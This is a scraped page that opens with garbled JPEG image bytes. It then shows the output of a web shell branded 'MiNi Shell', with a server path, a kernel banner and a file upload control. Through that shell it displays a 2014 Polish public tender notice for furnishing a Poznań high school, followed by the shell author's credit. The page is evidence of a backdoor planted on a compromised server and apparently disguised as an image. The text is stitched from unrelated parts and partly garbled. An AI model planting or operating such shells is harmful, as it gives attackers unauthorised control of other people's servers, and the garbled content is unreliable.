JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140509/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140509/156580-N-2014.html

<p class="kh_header"><b>Poznań: Dostawa mebli oraz wyposażenia do nowej siedziby VIII Liceum Ogólnokształcącego im. Adama Mickiewicza w Poznaniu przy ul. Cegielskiego 1</b><br>
<b>Numer ogłoszenia: 156580 - 2014; data zamieszczenia: 09.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> VIII Liceum Ogólnokształcące im. Adama Mickiewicza , Ul. Głogowska 92, 60-262 Poznań, woj. wielkopolskie, tel. 618661037, faks 618663387.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lo8.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mebli oraz wyposażenia do nowej siedziby VIII Liceum Ogólnokształcącego im. Adama Mickiewicza w Poznaniu przy ul. Cegielskiego 1.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa mebli oraz wyposażenia do pomieszczeń biurowych, administracyjnych i sal lekcyjnych w nowej siedzibie VIII Liceum Ogólnokształcącego im. Adama Mickiewicza w Poznaniu przy ul. Cegielskiego 1.
1.	Biurko Longplay płozy 180x90 z blendą - 1;
2.	Biurko Longplay płozy 140x80 z blendą - 2;
3.	Biurko Longplay nogi 140x80 z blendą - 1;
4.	Biurko Longplay nogi 90x60 - 2;
5.	Biurko Manhattan nogi kwadratowe 180x80 z przelotką - 2;
6.	Biurko Manhattan narożne lewe lub prawe 160x80x100x60 z przelotką (do połączenia z kontenerkiem K3) - 2;
7.	Biurko Manhattan proste 160x80 z przelotką - 26;
8.	Biurko Manhattan proste 160x60 z 2 przelotkami - 1;
9.	Biurko Manhattan proste 140x80 z blendą i z przelotką	 - 2;
10.	Biurko Manhattan proste 140x80 z przelotką - 5;
11.	Biurko Manhattan proste 80x80 z przelotką - 5;
12.	Biurko Manhattan proste 140x70 z blendą i z przelotką (z jednej strony na 2 nogach, z drugiej na szafce) - 18;
13.	Biurko Manhattan narożne lewe lub prawe 160x80x100x60 z blendą i z przelotką (do połączenia z kontenerkiem K3 lub K4) - 5;
14.	Stół Longplay 4 nogi 220x90 - 1;
15.	Stół Longplay 4 nogi 140x80 - 1;
16.	Stolik Longplay 1 noga średnica 85 - 1;
17.	Stół Manhattan 4 nogi okrągłe 80x80 - 14;
18.	Stół Manhattan 4 nogi okrągłe 80x80 - 1;
19.	Stolik Manhattan 4 nogi okrągłe średnica 85 - 2;
20.	Dostawka Manhattan półokrągła 164ź60 do 2 biurek gł. 80 cm i ścianki - 1;
21.	Dostawka Manhattan ? koła do 2 biurek gł. 80 cm - 1;
22.	Ścianka Manhattan międzybiurkowa 160 cm - 1;
23.	Ścianka frontowa 180 cm z blacikiem recepcyjnym - 1;
24.	Kontenerek podbiurkowy z 3 szufladami mobilny - 4;
25.	Kontenerek podbiurkowy z 3 szufladami mobilny - 5;
26.	Kontenerek dobiurkowy (do wys. biurka) z 4 szufladami stały - 5;
27.	Szafka dobiurkowa (do wys. biurka) z 1 drzwiami i 1 półką - 	2;
28.	Szafa aktowa 5 P	- 5;
29.	Szafka aktowa 2 P - 1;
30.	Szafka wąska 2 P - 2;
31.	Szafa aktowa 5 P = 2 P drzwi pełne + 3 P witryna - 3;
32.	Szafa aktowa 4 P = 2 P drzwi pełne + 2 P witryna - 1;
33.	Szafa aktowa 4 P = 2 P drzwi pełne + 2 P otwarte - 1;
34.	Szafa aktowa 4 P = 3 szuflady + 1 P otwarta - 1;
35.	Szafa ubraniowa wąska - 2;
36.	Szafa ubraniowa duża - 3;
37.	Szafka na buty wym. Ok. 80x44xH100 (na 3 poziomy butów) - 2;
38.	Szafka skrytkowa 3 P - 5;
39.	Nadstawka skrytkowa 2 P - 5;
40.	Wspólny cokół dla 5 szafek H.20 cm - 1;
41.	Szafa aktowa 5 P głęboka - 3;
42.	Szafa aktowa 5 P głęboka = 3 szuflady + 2 P witryna - 1;
43.	Regał 5 P na czasopisma - 1;
44.	Szafa aktowa 5 P - 24;
45.	Szafa aktowa 3 P	 - 12;
46.	Szafka aktowa 2 P - 7;
47.	Szafa aktowa 5 P = 3 P drzwi pełne + 2 P otwarte - 2;
48.	Szafa aktowa 5 P = 2 P drzwi pełne + 3 P otwarte - 24;
49.	Szafa aktowa 3 P = 2 P drzwi pełne + 1 P otwarta - 8;
50.	Szafa-nadstawka aktowa 2 P drzwi pełne - 3;
51.	Regał otwarty 5 P	- 51;
52.	Regał otwarty 3 P - 5;
53.	Regał otwarty 2 P	 - 2;
54.	Szafa ubraniowo-aktowa 5 P z lustrem - 4;
55.	Szafa ubraniowo-aktowa 5 P - 1;
56.	Szafa metalowa wym. Ok. 100x43xH.200 cm - 1;
57.	Gabinetowy fotel obrotowy z oparciem tapicerowanym z przodu i z tyłu - 1;
58.	Gabinetowy fotel obrotowy z oparciem tapicerowanym z przodu i z tyłu - 2;
59.	Pracowniczy fotel obrotowy z oparciem tapicerowanym z przodu, z tyłu plastikowa maskownica - 9;
60.	Nauczycielski fotel obrotowy z oparciem z siatki	- 3;
61.	Uczniowski fotel obrotowy - 54;
62.	Krzesło na nogach z oparciem z siatki i z podłokietnikami - 13;
63.	Krzesło na nogach z oparciem z siatki - 76;
64.	Uczniowskie krzesło na nogach ze sklejki (plus do 180 szt. Krzeseł łączniki)-192;
65.	Sofka 2-osobowa z zabudowanymi bokami	 - 1;
66.	Ławka na korytarz - 3 kubełki na 1 ramie (3 antracyt + 1 biały) - 1;
67.	Lada z 3 elementów: prosty wysoki (szer.ok.200, głęb.ok.70, wys.ok.115 cm) + narożny wysoki (szer.ok.80, głęb.ok.70, wys.ok.115cm) + prosty niski (szer.ok.80, głęb.ok.70, wys.ok.73cm) - 1;
68.	Aneks: szafka dolna 80 + zlewozmywak 80 + bateria + szafka górna 80 + szafka dolna z szufladą 40 + lodówka podblatowa 60 + blat 100 + kuch. mikrofalowa-1;
69.	Aneks: szafka dolna 80 + zlewozmywak 80 + bateria + szafka górna 80 + szafka dolna z szufladą 40 + lodówka podblatowa 60 + blat 100 + kuch. Mikrofalowa + szafka dolna 60 + zlewozmywak 60 + bateria-1;
70.	Aneks: szafka dolna 80 + zlewozmywak 80 + bateria + szafka górna 80 + szafka dolna z szufladą 40 + lodówka podblatowa 60 + blat 100 + kuch. Mikrofalowa-1;
71.	Aneks: szafka dolna 80 + zlewozmywak 80 + bateria + szafka górna 80 - 1;
72.	Aneks: szafka dolna 80 + szafka dolna z szufladą 40 + blat 120 - 1;
73.	Aneks: szafka dolna 80 + bateria + szafka dolna z szufladą 40 + lodówka podblatowa 60 + blat 100 - 1;
74.	Zabudowa w sali geograficznej - ściana z daszkiem i z drzwiami - 1;
75.	Wózek na komputer - 4;
76.	Duże lustro na ścianę - 3;
77.	Niski stolik na czasopisma - 1;

Ewentualne nazwy mają jedynie charakter informacyjny i służą wskazaniu wzorców jakościowych. Zamawiający dopuszcza rozwiązania równoważne, zgodne z opisem przedmiotu zamówienia.
WYKONAWCA dostarczy przedmiot zamówienia własnym transportem i na własny koszt do pomieszczeń wskazanych przez ZAMAWIAJĄCEGO łącznie z montażem.
WYKONAWCA dostarczy łącznie z zamawianymi meblami zaświadczenia podmiotu uprawnionego do kontroli jakości, potwierdzające, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym.
Dostarczony sprzęt musi być nowy, nieużywany, bez wad i uszkodzeń.
Dostarczony sprzęt musi posiadać wszystkie wymagane prawem polskim certyfikaty, szczegółowo wskazane w opisie przedmiotu zamówienia.
Szczegółowy opis przedmiotu zamówienia oraz wymagania zawiera załącznik nr 6 do SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2, 39.15.50.00-3, 39.16.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 06.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 6400,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie definiuje szczegółowego opisu sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże, że w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał należycie co najmniej dwie dostawy mebli oraz wyposażenia do placówek dydaktycznych o wartości nie mniejszej niż 200 000 zł brutto każda</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie definiuje szczegółowego opisu sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie definiuje szczegółowego opisu sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 200 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Wypełniony i podpisany Formularz ofertowy - załącznik nr 1 do SIWZ;
2)	Wypełniony i podpisany Formularz cenowy - załącznik nr 9 do SIWZ;
3)	Jeżeli zasady reprezentacji nie wynikają jednoznacznie z przedłożonych wypisów (odpisów), wymaga się złożenia dokumentu (w formie oryginału lub potwierdzonej notarialnie kopii - dotyczy wyłącznie pełnomocnictwa) wskazującego osobę uprawnioną do reprezentowania Wykonawcy;
4)	 Jeżeli Wykonawca zastrzega niejawność informacji stanowiących treść oferty, na podstawie art. 8 ust. 3 ustawy zobowiązany jest załączyć do oferty wypełniony i podpisany załącznik nr 5 do SIWZ oraz zabezpieczyć dokumenty, których treść stanowi tajemnicę przedsiębiorstwa w sposób uniemożliwiający bezpośrednie odczytanie treści np. poprzez zastosowanie nieprzejrzystej folii. Niedochowanie należytej staranności w tym zakresie może spowodować niezamierzone ujawnienie treści przedmiotowych dokumentów</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Gwarancja - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje przedłużenie terminu realizacji w przypadku przedłużenia prac remontowo -  adaptacyjnych siedziby przy ul. Cegielskiego 1</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.poznan.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> VIII Liceum Ogólnokształcące im. Adama Mickiewicza w Poznaniu
ul. Głogowska 92
60-262 Poznań.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.05.2014 godzina 14:30, miejsce: VIII Liceum Ogólnokształcące im. Adama Mickiewicza w Poznaniu
ul. Głogowska 92
60-262 Poznań
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com